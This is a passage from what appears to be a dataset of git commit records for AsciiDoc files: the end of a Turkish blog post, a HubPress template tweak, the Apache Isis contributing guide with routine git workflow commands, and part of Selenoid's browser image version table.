kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c963bb735382682def05c48b302f69b0a5522aae","subject":"Update 2017-10-18-Blog-Title.adoc","message":"Update 2017-10-18-Blog-Title.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Blog-Title.adoc","new_file":"_posts\/2017-10-18-Blog-Title.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n:hp-tags: ubPress, Blog, Open_Source\n\n= Blog Title\n\n:hp-image: \/images\/cover-image.jpg","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Blog Title\n\n:hp-image: \/images\/cover-image.jpg","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1fdd64e5c20a55dbc0cad80647dbc7e615a0b9d8","subject":"ISIS-2258: use AsciiDoc's footnote format to provide a footnote","message":"ISIS-2258: use AsciiDoc's footnote format to provide a footnote\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/toc\/modules\/devguide\/pages\/contributing.adoc","new_file":"antora\/components\/toc\/modules\/devguide\/pages\/contributing.adoc","new_contents":"[[contributing]]\n= Contributing\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\ninclude::_attributes.adoc[]\n:page-partial:\n\n\n\n\nThis page explains how you can contribute to Apache Isis. You'll probably also want xref:toc:devguide:ide.adoc[set up your IDE] and learn xref:toc:devguide:building-apache-isis.adoc[how to build Apache Isis].\n\nThanks for considering to help out, your contributions are appreciated!\n\n\n== Recommended Workflow (github)\n\nApache Isis' source code is hosted in at github (https:\/\/github.com\/apache\/isis.git[https], or ssh: `git@github.com:apache\/isis.git`).\n\nAs you might imagine, only committers are permitted to push changes to the github repo.\nAs a contributor, we recommend that you fork the https:\/\/github.com\/apache\/isis.git[apache\/isis] github repo, and then use your fork as a way of publishing your patches for the Apache Isis committers to apply.\n\nThe diagram below illustrates the process:\n\nimage::contributing\/git-workflow.png[width=\"600px\",link=\"{imagesdir}\/contributing\/git-workflow.png\"]\n\n\nThat is:\n\n. as a one-time activity, you fork the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] repo into your own fork on github.com\n. as a one-time activity, you clone your fork to your local computer\n. you set the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] as your upstream branch; this will allow you to keep your local clone up-to-date with new commits\n* note the asymmetry here: the `upstream` repo (the Apache github repo) is *not* the same as the `origin` repo (your fork).\n. you work on your changes locally; when done, you push them to your github fork\n. to contribute back a change, raise a https:\/\/issues.apache.org\/jira\/browse\/ISIS[JIRA] ticket, and ensure your commit message is in the form: `ISIS-nnnn: ...` so that changes can be tracked (more discussion on this point below). In any case, before you decide to start hacking with Apache Isis, it's always worth creating a ticket in JIRA and then have a discussion about it on the xref:toc:ROOT:support.adoc#[mailing lists].\n. Use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request] for your feature\n. An Apache Isis committer will review your change, and apply it if suitable.\n\n\n\n\n\n\n== Setting up your fork\/clone\n\nIf you choose to create your own fork then you'll need an account on https:\/\/github.com[github.com]. You then fork simply by pressing the \"Fork\" button:\n\n\nimage::contributing\/github-forking.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-forking.png\"]\n\n\n\nAn account isn't needed if you just clone straight from the http:\/\/github.com\/apache\/isis[github.com\/apache\/isis].\n\nWhether you've forked or not, you then need to clone the repo onto your computer. Github makes this very easy to do:\n\n* for Windows users, we suggest you use github's 'Clone in Windows' feature\n* for Mac\/Linux users, create a clone from the command line:\n\nAgain, the info is easily found in the github page:\n\n\n\nimage::contributing\/github-cloning.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-cloning.png\"]\n\nIf you've created your own fork, then you need to add the `upstream` remote to the https:\/\/github.com\/apache\/isis[github.com\/apache\/isis]. This remote is traditionally called `upstream`. You should then arrange for your `master` branch to track the `upstream\/master` remote branch:\n\nIf you didn't create your own fork, you can omit the above step. Either way around, you can now fetch new commits using simply:\n\n\n[source,bash]\n----\ngit fetch\n----\n\n\nFor more info on tracking branches http:\/\/git-scm.com\/book\/en\/Git-Branching-Remote-Branches[here] and http:\/\/gitready.com\/beginner\/2009\/03\/09\/remote-tracking-branches.html[here].\n\n\n\n\n\n== Commit messages\n\nAlthough with git your commits are always performed on your local repo, those commit messages become public when the patch is applied by an Apache Isis committer. You should take time to write a meaningful commit message that helps explain what the patch refers to; if you don't then there's a chance that your patch may be rejected and not applied. No-one likes hard work to go to waste!\n\nWe therefore recommend that your commit messages are as follows:footnote:[Inspiration for the recommended commit format comes from the https:\/\/github.com\/puppetlabs\/puppet[puppet] project's https:\/\/github.com\/puppetlabs\/puppet\/blob\/master\/CONTRIBUTING.md[contributing] page.]\n\n[source,other]\n----\nISIS-999: Make the example in CONTRIBUTING imperative and concrete\n\nWithout this patch applied the example commit message in the CONTRIBUTING\ndocument is not a concrete example. This is a problem because the\ncontributor is left to imagine what the commit message should look like\nbased on a description rather than an example. This patch fixes the\nproblem by making the example concrete and imperative.\n\nThe first line is a real life imperative statement with a ticket number\nfrom our issue tracker. The body describes the behavior without the patch,\nwhy this is a problem, and how the patch fixes the problem when applied.\n----\n\n\n\n\n\n\n== Creating the patch file\n\nIf you are working without a github fork of Apache Isis, then you can create the patches from your own local git repository.\n\nAs per http:\/\/stackoverflow.com\/questions\/6658313\/generate-a-git-patch-for-a-specific-commit[this stackoverflow question], create the patch using `git format-patch`:\n\n[source,bash]\n----\ngit format-patch -10 HEAD --stdout > 0001-last-10-commits.patch\n----\n\nHere `-10` is the last 10 commits you have done. You need to change that integer according to the commits you need to apply into the patch.\n\n\n\n\n== Sample Contribution Workflow\n\nAssuming you're development environment is all setup, let's walk through how you might make contribute a patch. In this example, suppose that you've decided to work on JIRA ticket #123, an enhancement to support Blob\/Clob datatypes.\n\n=== Update your master branch\n\nThe first thing to do is to make sure your local clone is up-to-date. We do this by retrieving new commits from upstream repo and then merging them as a fast-forward into your local branch.\n\nIrrespective of whether you are using a github fork, the upstream for your local `master` branch will be tracking the appropriate remote's `master` branch. So n either case, the same commands work:\n\nAlternatively, you can combine the `git fetch` and `git merge` and just use `git pull`:\n<pre>\ngit checkout master\ngit pull \u2013ff-only\n<\/pre>\n\nIf the `merge` or `pull` fails, it means that you must have made commits and there have been changes meanwhile on the remote `master`'s branch. You can use `gitk --all` to confirm. If this fails, see our xref:_dg_git-cookbook.adoc#[git cookbook] page for a procedure to retrospectively sort out this situation.\n\n\n\n=== Create a topic branch\n\nWe recommend you name topic branches by the JIRA ticket, ie <tt>ISIS-nnn-description<\/tt>. So let's create a new branch based off `master` and call it \"ISIS-123-blobs\"\n\nYou can confirm the branch is there and is your new `HEAD` using either `gitk --all`. Alternatively, use the command line:\n\n\n[source,bash]\n----\n$ git checkout -b ISIS-123-blobs\n----\n\n\nThe command line prompt should also indicate you are on a branch, isolated from any changes that might happen on the `master` branch.\n\n=== Make File Changes and Commit\n\nNext, make changes to your files using the usual commands (see also our xref:toc:devguide:git-cookbook.adoc[git cookbook] section):\n\n* `git add`\n* `git mv`\n* `git rm`\n* `git commit`\n* `git status`\n\nand so on.\n\nContinue this way until happy with the change. Remember to run all your tests on the topic branch (including a full `mvn clean install`).\n\n\n\n\n=== Rebasing with `master`\n\nBefore you can share your change, you should rebase (in other words replay) your changes on top of the `master` branch.\n\nThe first thing to do is to pull down any changes made in upstream remote's `master` since you started your topic branch:\n\nThese are the same commands that you would have run before you created your topic branch. If you use `gitk --all`, there's a good chance that new commits have come in.\n\nNext, we reintegrate our topic branch by rebasing onto `master`:\n<pre>\ngit checkout ISIS-123-blobs\ngit rebase master\n<\/pre>\n\nThis takes all of the commits in your branch, and applies them on top of the new `master` branch. When your change is eventually integrated back in, it will result in a nice clear linear history on the public repo.\n\nIf the rebase fails because of a conflict, then you'll be dumped into REBASE mode. Edit the file that has the conflict, and make the appropriate edits. Once done:\n\nOnce the rebase has completed, re-run your tests to confirm that everything is still good.\n\n\n\n=== Raising a pull request\n\nIf you have your own fork, you can now simply push the changes you've made locally to your fork:\n\nThis will create a corresponding branch in the remote github repo. If you use `gitk --all`, you'll also see a `remotes\/origin\/ISIS-123-blobs` branch.\n\nThen, use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request]. Pull requests sent to the Apache GitHub repositories will forward a pull request e-mail to the xref:toc:ROOT:support.adoc#[dev mailing list]. You'll probably want to sign up to the dev mailing list first before issuing your first pull request (though that isn't mandatory).\n\nThe process to raise the pull request, broadly speaking:\n\n* Open a web browser to your github fork of isis\n* Select your topic branch (pushed in the previous step) so that the pull request references the topic branch.\n* Click the `Pull Request` button.\n* Check that the Apache Isis mailing list email came through.\n\n\n\n== If your pull request is accepted\n\nTo double check that your pull request is accepted, update your `master` branch from the `upstream` remote:\n\nYou can then use `gitk --all` (or `git log` if you prefer the command line) to check your contribution has been added.\n\nYou can now delete your topic branch and remove the branch in your github:\n\nFinally, you might want to push the latest changes in master back up to your github fork. If so, use:\n\n\n\n=== If your pull request is rejected\n\nIf your pull request is rejected, then you'll need to update your branch from the main repository and then address the rejection reason.\n\nYou'll probably also want to remove the remote branch on github:\n\n[source,bash]\n----\ngit push origin \u2013delete ISIS-123-blobs\n----\n\n\n\u2026 and continue as before until you are ready to resubmit your change.\n","old_contents":"[[contributing]]\n= Contributing\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\ninclude::_attributes.adoc[]\n:page-partial:\n\n\n\n\nThis page explains how you can contribute to Apache Isis. You'll probably also want xref:toc:devguide:ide.adoc[set up your IDE] and learn xref:toc:devguide:building-apache-isis.adoc[how to build Apache Isis].\n\nThanks for considering to help out, your contributions are appreciated!\n\n\n== Recommended Workflow (github)\n\nApache Isis' source code is hosted in at github (https:\/\/github.com\/apache\/isis.git[https], or ssh: `git@github.com:apache\/isis.git`).\n\nAs you might imagine, only committers are permitted to push changes to the github repo.\nAs a contributor, we recommend that you fork the https:\/\/github.com\/apache\/isis.git[apache\/isis] github repo, and then use your fork as a way of publishing your patches for the Apache Isis committers to apply.\n\nThe diagram below illustrates the process:\n\nimage::contributing\/git-workflow.png[width=\"600px\",link=\"{imagesdir}\/contributing\/git-workflow.png\"]\n\n\nThat is:\n\n. as a one-time activity, you fork the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] repo into your own fork on github.com\n. as a one-time activity, you clone your fork to your local computer\n. you set the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] as your upstream branch; this will allow you to keep your local clone up-to-date with new commits\n* note the asymmetry here: the `upstream` repo (the Apache github repo) is *not* the same as the `origin` repo (your fork).\n. you work on your changes locally; when done, you push them to your github fork\n. to contribute back a change, raise a https:\/\/issues.apache.org\/jira\/browse\/ISIS[JIRA] ticket, and ensure your commit message is in the form: `ISIS-nnnn: ...` so that changes can be tracked (more discussion on this point below). In any case, before you decide to start hacking with Apache Isis, it's always worth creating a ticket in JIRA and then have a discussion about it on the xref:toc:ROOT:support.adoc#[mailing lists].\n. Use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request] for your feature\n. An Apache Isis committer will review your change, and apply it if suitable.\n\n\n\n\n\n\n== Setting up your fork\/clone\n\nIf you choose to create your own fork then you'll need an account on https:\/\/github.com[github.com]. You then fork simply by pressing the \"Fork\" button:\n\n\nimage::contributing\/github-forking.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-forking.png\"]\n\n\n\nAn account isn't needed if you just clone straight from the http:\/\/github.com\/apache\/isis[github.com\/apache\/isis].\n\nWhether you've forked or not, you then need to clone the repo onto your computer. Github makes this very easy to do:\n\n* for Windows users, we suggest you use github's 'Clone in Windows' feature\n* for Mac\/Linux users, create a clone from the command line:\n\nAgain, the info is easily found in the github page:\n\n\n\nimage::contributing\/github-cloning.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-cloning.png\"]\n\nIf you've created your own fork, then you need to add the `upstream` remote to the https:\/\/github.com\/apache\/isis[github.com\/apache\/isis]. This remote is traditionally called `upstream`. You should then arrange for your `master` branch to track the `upstream\/master` remote branch:\n\nIf you didn't create your own fork, you can omit the above step. Either way around, you can now fetch new commits using simply:\n\n\n[source,bash]\n----\ngit fetch\n----\n\n\nFor more info on tracking branches http:\/\/git-scm.com\/book\/en\/Git-Branching-Remote-Branches[here] and http:\/\/gitready.com\/beginner\/2009\/03\/09\/remote-tracking-branches.html[here].\n\n\n\n\n\n== Commit messages\n\nAlthough with git your commits are always performed on your local repo, those commit messages become public when the patch is applied by an Apache Isis committer. You should take time to write a meaningful commit message that helps explain what the patch refers to; if you don't then there's a chance that your patch may be rejected and not applied. No-one likes hard work to go to waste!\n\nWe therefore recommend that your commit messages are as follows [1]:\n\n[source,other]\n----\nISIS-999: Make the example in CONTRIBUTING imperative and concrete\n\nWithout this patch applied the example commit message in the CONTRIBUTING\ndocument is not a concrete example. This is a problem because the\ncontributor is left to imagine what the commit message should look like\nbased on a description rather than an example. This patch fixes the\nproblem by making the example concrete and imperative.\n\nThe first line is a real life imperative statement with a ticket number\nfrom our issue tracker. The body describes the behavior without the patch,\nwhy this is a problem, and how the patch fixes the problem when applied.\n----\n\n\n\n\n\n\n== Creating the patch file\n\nIf you are working without a github fork of Apache Isis, then you can create the patches from your own local git repository.\n\nAs per http:\/\/stackoverflow.com\/questions\/6658313\/generate-a-git-patch-for-a-specific-commit[this stackoverflow question], create the patch using `git format-patch`:\n\n[source,bash]\n----\ngit format-patch -10 HEAD --stdout > 0001-last-10-commits.patch\n----\n\nHere `-10` is the last 10 commits you have done. You need to change that integer according to the commits you need to apply into the patch.\n\n\n\n\n== Sample Contribution Workflow\n\nAssuming you're development environment is all setup, let's walk through how you might make contribute a patch. In this example, suppose that you've decided to work on JIRA ticket #123, an enhancement to support Blob\/Clob datatypes.\n\n=== Update your master branch\n\nThe first thing to do is to make sure your local clone is up-to-date. We do this by retrieving new commits from upstream repo and then merging them as a fast-forward into your local branch.\n\nIrrespective of whether you are using a github fork, the upstream for your local `master` branch will be tracking the appropriate remote's `master` branch. So n either case, the same commands work:\n\nAlternatively, you can combine the `git fetch` and `git merge` and just use `git pull`:\n<pre>\ngit checkout master\ngit pull \u2013ff-only\n<\/pre>\n\nIf the `merge` or `pull` fails, it means that you must have made commits and there have been changes meanwhile on the remote `master`'s branch. You can use `gitk --all` to confirm. If this fails, see our xref:_dg_git-cookbook.adoc#[git cookbook] page for a procedure to retrospectively sort out this situation.\n\n\n\n=== Create a topic branch\n\nWe recommend you name topic branches by the JIRA ticket, ie <tt>ISIS-nnn-description<\/tt>. So let's create a new branch based off `master` and call it \"ISIS-123-blobs\"\n\nYou can confirm the branch is there and is your new `HEAD` using either `gitk --all`. Alternatively, use the command line:\n\n\n[source,bash]\n----\n$ git checkout -b ISIS-123-blobs\n----\n\n\nThe command line prompt should also indicate you are on a branch, isolated from any changes that might happen on the `master` branch.\n\n=== Make File Changes and Commit\n\nNext, make changes to your files using the usual commands (see also our xref:toc:devguide:git-cookbook.adoc[git cookbook] section):\n\n* `git add`\n* `git mv`\n* `git rm`\n* `git commit`\n* `git status`\n\nand so on.\n\nContinue this way until happy with the change. Remember to run all your tests on the topic branch (including a full `mvn clean install`).\n\n\n\n\n=== Rebasing with `master`\n\nBefore you can share your change, you should rebase (in other words replay) your changes on top of the `master` branch.\n\nThe first thing to do is to pull down any changes made in upstream remote's `master` since you started your topic branch:\n\nThese are the same commands that you would have run before you created your topic branch. If you use `gitk --all`, there's a good chance that new commits have come in.\n\nNext, we reintegrate our topic branch by rebasing onto `master`:\n<pre>\ngit checkout ISIS-123-blobs\ngit rebase master\n<\/pre>\n\nThis takes all of the commits in your branch, and applies them on top of the new `master` branch. When your change is eventually integrated back in, it will result in a nice clear linear history on the public repo.\n\nIf the rebase fails because of a conflict, then you'll be dumped into REBASE mode. Edit the file that has the conflict, and make the appropriate edits. Once done:\n\nOnce the rebase has completed, re-run your tests to confirm that everything is still good.\n\n\n\n=== Raising a pull request\n\nIf you have your own fork, you can now simply push the changes you've made locally to your fork:\n\nThis will create a corresponding branch in the remote github repo. If you use `gitk --all`, you'll also see a `remotes\/origin\/ISIS-123-blobs` branch.\n\nThen, use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request]. Pull requests sent to the Apache GitHub repositories will forward a pull request e-mail to the xref:toc:ROOT:support.adoc#[dev mailing list]. You'll probably want to sign up to the dev mailing list first before issuing your first pull request (though that isn't mandatory).\n\nThe process to raise the pull request, broadly speaking:\n\n* Open a web browser to your github fork of isis\n* Select your topic branch (pushed in the previous step) so that the pull request references the topic branch.\n* Click the `Pull Request` button.\n* Check that the Apache Isis mailing list email came through.\n\n\n\n== If your pull request is accepted\n\nTo double check that your pull request is accepted, update your `master` branch from the `upstream` remote:\n\nYou can then use `gitk --all` (or `git log` if you prefer the command line) to check your contribution has been added.\n\nYou can now delete your topic branch and remove the branch in your github:\n\nFinally, you might want to push the latest changes in master back up to your github fork. If so, use:\n\n\n\n=== If your pull request is rejected\n\nIf your pull request is rejected, then you'll need to update your branch from the main repository and then address the rejection reason.\n\nYou'll probably also want to remove the remote branch on github:\n\n[source,bash]\n----\ngit push origin \u2013delete ISIS-123-blobs\n----\n\n\n\u2026 and continue as before until you are ready to resubmit your change.\n\n[1] inspiration for the recommended commit format comes from the https:\/\/github.com\/puppetlabs\/puppet[puppet] project's https:\/\/github.com\/puppetlabs\/puppet\/blob\/master\/CONTRIBUTING.md[contributing] page.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed4eedc5909fe6d4b2f23b1fbdabb1467b8e22b2","subject":"Updated browser image information to reflect Firefox image changes","message":"Updated browser image information to reflect Firefox image changes\n","repos":"aerokube\/selenoid,aerokube\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid","old_file":"docs\/browser-image-information.adoc","new_file":"docs\/browser-image-information.adoc","new_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .30+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 3.2.0 + GD 0.13.0 | 48.0.2 (native events and proxies don't work) \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 3.2.0 + GD 0.13.0 | 49.0.2 (native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 3.2.0 + GD 0.13.0 | 50.0.2 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 3.2.0 + GD 0.14.0 | 51.0.1 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 3.3.1 + GD 0.15.0 | 52.0.2 (native events, switching windows don't work; proxy capability format could change) \n|===\n\nWARNING: Firefox images below require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.7 | 0.16.0 | 53.0 (switching windows may not work) .4+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.7 | 0.17.0 | 54.0 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.7 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.7 | 0.19.0 | 56.0 \n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| 